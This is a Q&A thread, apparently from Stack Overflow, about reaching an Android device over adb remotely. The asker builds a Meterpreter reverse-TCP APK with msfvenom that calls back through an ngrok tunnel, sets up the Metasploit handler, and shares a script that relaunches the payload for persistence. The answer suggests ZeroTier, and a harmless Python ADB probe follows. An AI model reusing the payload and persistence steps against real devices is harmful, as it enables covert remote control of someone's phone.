Connect to ADB with ngrok and reverse tcp

I have an Android device at home that I use to develop on, and I'm connecting to it through my laptop with adb and scrcpy. However, if I'm not home adb doesn't see the device. I made an apk for the device with msfvenom for reverse tcp like this:

msfvenom -p android/meterpreter/reverse_tcp LHOST=x.tcp.ngrok.io LPORT=(ngrok port) R > /home/user/reversetcp.apk

Then I set up the reverse tcp handler in msfconsole:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit

After this I install and run the apk on my device, then meterpreter opens the session:

[*] Meterpreter session 1 opened (127.0.0.1:25565 -> 127.0.0.1:40146) at 2023-01-07 21:39:43 +0100

and the ngrok console shows 1 connection (my device). But if I try to add the ngrok server to adb like this:

adb connect "ngrok address" 

(There I tried the ngrok tcp link, and 127.0.0.1 with both ports; none of them works.) I get the following error:

failed to connect to '127.0.0.1:25565': Connection refused

I could make a VPN on my local network, but the power usually goes down, so the VPN is a dead end. What am I doing wrong? Or can't adb connect with ngrok?

My second issue is that meterpreter randomly closes the session after around 8 minutes, and if the device powers off and on, or if the power goes out, the device switches from wifi to mobile data, and I can't reconnect. How can I make the apk run on startup and reconnect if there is a change in the internet connection?

Update: I made a shell script to reopen the reverse tcp apk after 10 mins or if there is internet connection, but it would be better if the connection wouldn't close, and the device isn't rooted, so I can't add the script to the folder to run on startup. Another way to keep the reverse tcp connection would be better, to open a reverse tcp (and keep it open), and if there is a change in the internet connection then reconnect automatically.

Btw, here is the script that I wrote:

#!/bin/sh

# check for internet connection
while ! ping -c 1 google.com &> /dev/null
do
  # wait 20 seconds before trying again
  sleep 20
done

# run the activity
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

# run the activity every 10 minutes
while true
do
  sleep 600
  am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
done

Upvotes: -1

Views: 1331

Answers (1)

Arshaluys Smbatyan

Reputation: 116

I am convinced that it is not possible to connect a device using a reverse meterpreter shell because ADB requires a raw TCP connection rather than a meterpreter shell.

You can use the ZeroTier application to create a private network for your devices that can be accessible via the internet. It functions similarly to a VPN, but traffic is routed directly rather than through a centralized VPN server.

This post describes how to connect adb using TCPIP in detail.

Upvotes: 0
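
The answer's point that adb needs a raw TCP path to adbd can be checked directly. The following is an added example, not code from the question or the answer: it sends the CNXN packet an adb client opens with and reports whether the endpoint refuses the connection, is open but does not speak the ADB wire protocol, or answers like adbd. The packet constants are from the AOSP adb protocol; the function names and result labels are assumptions made for this example.

```python
import socket
import struct
import sys

# ADB wire protocol: 24-byte little-endian header, then an optional payload.
A_CNXN, A_AUTH, A_STLS = 0x4E584E43, 0x48545541, 0x534C5453
A_VERSION, MAX_PAYLOAD = 0x01000000, 4096

def build_cnxn(banner: bytes = b"host::\x00") -> bytes:
    """Build the CNXN packet an adb client sends first."""
    checksum = sum(banner) & 0xFFFFFFFF  # protocol version 0x01000000 uses a byte sum
    header = struct.pack("<6I", A_CNXN, A_VERSION, MAX_PAYLOAD,
                         len(banner), checksum, A_CNXN ^ 0xFFFFFFFF)
    return header + banner

def classify_reply(reply: bytes) -> str:
    """Return 'adb' if the first 24 bytes are a valid ADB header, else 'not-adb'."""
    if len(reply) < 24:
        return "not-adb"
    command, *_, magic = struct.unpack("<6I", reply[:24])
    known = command in (A_CNXN, A_AUTH, A_STLS)  # replies adbd gives to CNXN
    return "adb" if known and magic == command ^ 0xFFFFFFFF else "not-adb"

def handshake(sock: socket.socket) -> str:
    """Send CNXN on a connected socket and classify the peer's first header."""
    reply = b""
    try:
        sock.sendall(build_cnxn())
        while len(reply) < 24:
            chunk = sock.recv(24 - len(reply))
            if not chunk:
                break
            reply += chunk
    except OSError:
        pass  # timeout or reset after connecting: port is open, peer is not adbd
    return classify_reply(reply)

def probe(host: str, port: int, timeout: float = 3.0) -> str:
    """Return 'refused', 'unreachable', 'not-adb' or 'adb' for one endpoint."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except ConnectionRefusedError:
        return "refused"  # nothing is listening, as in the error quoted in the question
    except OSError:
        return "unreachable"
    with sock:
        return handshake(sock)

if __name__ == "__main__":
    print(probe(sys.argv[1], int(sys.argv[2])))
```

A result of `adb` is expected only where adbd itself is listening in TCP mode and the address reaches it unmodified, for example the device's address on the private network the answer suggests.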
